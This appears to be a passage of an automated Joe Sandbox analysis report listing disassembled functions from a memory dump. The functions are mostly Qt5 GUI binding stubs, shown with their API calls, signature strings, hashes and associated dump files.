                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?formats@FormatLayout@@Layout@@@@Range@Vector@malloc
                                                                                                                                                                                                                                          • String ID: QTextLayout$formats$formats(self) -> List[QTextLayout.FormatRange]
                                                                                                                                                                                                                                          • API String ID: 1343035234-1866568316
                                                                                                                                                                                                                                          • Opcode ID: dc867ee4bd6c01c6aa1c413fa048b15794d11de1febfab2b0f79b9e811bbba93
                                                                                                                                                                                                                                          • Instruction ID: cc4650f3923f5c553abef2db8a6f8c79e421f9742ad42dede9d18b175c1111bd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc867ee4bd6c01c6aa1c413fa048b15794d11de1febfab2b0f79b9e811bbba93
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C113577A09A86C1EB109F61E8496A933A4FB44FD4F918032DA9E07320EF7DE559C344
                                                                                                                                                                                                                                          Function 00007FF89D95FD70 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?blockFormat@QTextCursor@@QEBA?AVQTextBlockFormat@@XZ.QT5GUI ref: 00007FF89D95FDC8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?blockBlockCursor@@Format@Format@@malloc
                                                                                                                                                                                                                                          • String ID: QTextCursor$blockFormat$blockFormat(self) -> QTextBlockFormat
                                                                                                                                                                                                                                          • API String ID: 3771012401-2836192656
                                                                                                                                                                                                                                          • Opcode ID: 8e2658cb27280373c0a47f28b723d12042dfea57fb329d5e926df48e3b51df04
                                                                                                                                                                                                                                          • Instruction ID: 10a1b368f0a573d6c91cac908bea84a4d64d4ffcc56bd6063c6917e0e37f84f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e2658cb27280373c0a47f28b723d12042dfea57fb329d5e926df48e3b51df04
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73110977A09A46C1EB109F61E8496A933A4FB44FD0F918032DA9E47360EF7DE559C344
                                                                                                                                                                                                                                          Function 00007FF89D935D40 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setOrientation@QPageLayout@@QEAAXW4Orientation@1@@Z.QT5GUI ref: 00007FF89D935DA2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setLayout@@Orientation@Orientation@1@@Page
                                                                                                                                                                                                                                          • String ID: QPageLayout$setOrientation$setOrientation(self, orientation: QPageLayout.Orientation)
                                                                                                                                                                                                                                          • API String ID: 1891949463-4195498082
                                                                                                                                                                                                                                          • Opcode ID: 94cc247d95ab0d99e3e61a93644cd534388f67ec895da9e83a2a9a2024e09f18
                                                                                                                                                                                                                                          • Instruction ID: a681ed17cc378f38f1843c4dd6aded62db8983a0bd27f756a753d4e115e36da4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94cc247d95ab0d99e3e61a93644cd534388f67ec895da9e83a2a9a2024e09f18
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D11D276A18E46C1EB20DF10E8896A933A5FB48B84F914132DA9E07320EF39E55AC744
                                                                                                                                                                                                                                          Function 00007FF89D9620A0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setRestartHint@QSessionManager@@QEAAXW4RestartHint@1@@Z.QT5GUI ref: 00007FF89D962102
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Restart$?setHint@Hint@1@@Manager@@Session
                                                                                                                                                                                                                                          • String ID: QSessionManager$setRestartHint$setRestartHint(self, a0: QSessionManager.RestartHint)
                                                                                                                                                                                                                                          • API String ID: 116914812-3553406877
                                                                                                                                                                                                                                          • Opcode ID: 61ec945707baf50667884b72e0819d42711cd8f7ddeeb2d108b6efda1171252d
                                                                                                                                                                                                                                          • Instruction ID: c834d4fcd330e34a88934503b5a083356fb58a4fd08fbd132e15504264f8e989
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61ec945707baf50667884b72e0819d42711cd8f7ddeeb2d108b6efda1171252d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9111376A08F46C1EB20DF11E8896A933A5FB48BC4F914132DA8E43320EF3DE55AC304
                                                                                                                                                                                                                                          Function 00007FF89D9360B0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setLayout@@PageUnit@1@@Units@
                                                                                                                                                                                                                                          • String ID: QPageLayout$setUnits$setUnits(self, units: QPageLayout.Unit)
                                                                                                                                                                                                                                          • API String ID: 1042583433-137683106
                                                                                                                                                                                                                                          • Opcode ID: dfa0fce72dddb0af0898693fa3293f97fcaa99e05d6d94df8e6db741c39dec2e
                                                                                                                                                                                                                                          • Instruction ID: c1a9a8f663feb201f124d25b3b99f89bb1efec0686607b153ae7d9ddbb9e4207
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dfa0fce72dddb0af0898693fa3293f97fcaa99e05d6d94df8e6db741c39dec2e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE11E676A18E46D1EB20DF11E8896A933B5FB48FC4F914132DA9E03320EF39E55AC704
                                                                                                                                                                                                                                          Function 00007FF89D994080 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mode@$?setBackgroundPainter@@Qt@@@
                                                                                                                                                                                                                                          • String ID: QPainter$setBackgroundMode$setBackgroundMode(self, mode: Qt.BGMode)
                                                                                                                                                                                                                                          • API String ID: 133799183-3218199416
                                                                                                                                                                                                                                          • Opcode ID: 36e5d5816767f90e3353b4ed716429493aa8692f3ff2f6e41f4ff677501b7c3b
                                                                                                                                                                                                                                          • Instruction ID: 221a11e15b1de5dead7d96d8ce88bfe9211315d6bda8f9610c15431bf2f137de
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36e5d5816767f90e3353b4ed716429493aa8692f3ff2f6e41f4ff677501b7c3b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE11E676A18F46C1EB20CF15E8896A933A5FB48F94F914132DA9E03320EF3DE559C708
                                                                                                                                                                                                                                          Function 00007FF89D97C090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?numberPrefix@QTextListFormat@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FF89D97C0E8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?numberFormat@@ListPrefix@String@@Textmalloc
                                                                                                                                                                                                                                          • String ID: QTextListFormat$numberPrefix$numberPrefix(self) -> str
                                                                                                                                                                                                                                          • API String ID: 3887568297-2020782398
                                                                                                                                                                                                                                          • Opcode ID: 7285e651dd2b910952784e26df1bf148de4cbeabc2c7bda41787016fefe3b8b6
                                                                                                                                                                                                                                          • Instruction ID: 2ff5f75bf04b3b888e5c5508cfc8763c28e414426be16ac962a5dddf22f44445
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7285e651dd2b910952784e26df1bf148de4cbeabc2c7bda41787016fefe3b8b6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29113937A08A4685EB109F21E84A6A933E4FB44FD0F918032C98E07320EF7CE559C344
                                                                                                                                                                                                                                          Function 00007FF89D9640E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setDeviceDevice@@TouchType@Type@1@@
                                                                                                                                                                                                                                          • String ID: QTouchDevice$setType$setType(self, devType: QTouchDevice.DeviceType)
                                                                                                                                                                                                                                          • API String ID: 3736315891-2165394557
                                                                                                                                                                                                                                          • Opcode ID: e06d3ea0e4e178cafea0f7ad3de114c61733ac92c02e20d297d019ac16b7daba
                                                                                                                                                                                                                                          • Instruction ID: a897967de3f7803e22a28e7ef1164708f7944986d8f9231898811c7eb3629a3f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e06d3ea0e4e178cafea0f7ad3de114c61733ac92c02e20d297d019ac16b7daba
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9611D476A18F46D1EB209B11E8896A933A5FB48BC4F914132DA9E03324EF39E559C704
                                                                                                                                                                                                                                          Function 00007FF89D9660F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?frameGeometry@QWindow@@QEBA?AVQRect@@XZ.QT5GUI ref: 00007FF89D966148
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
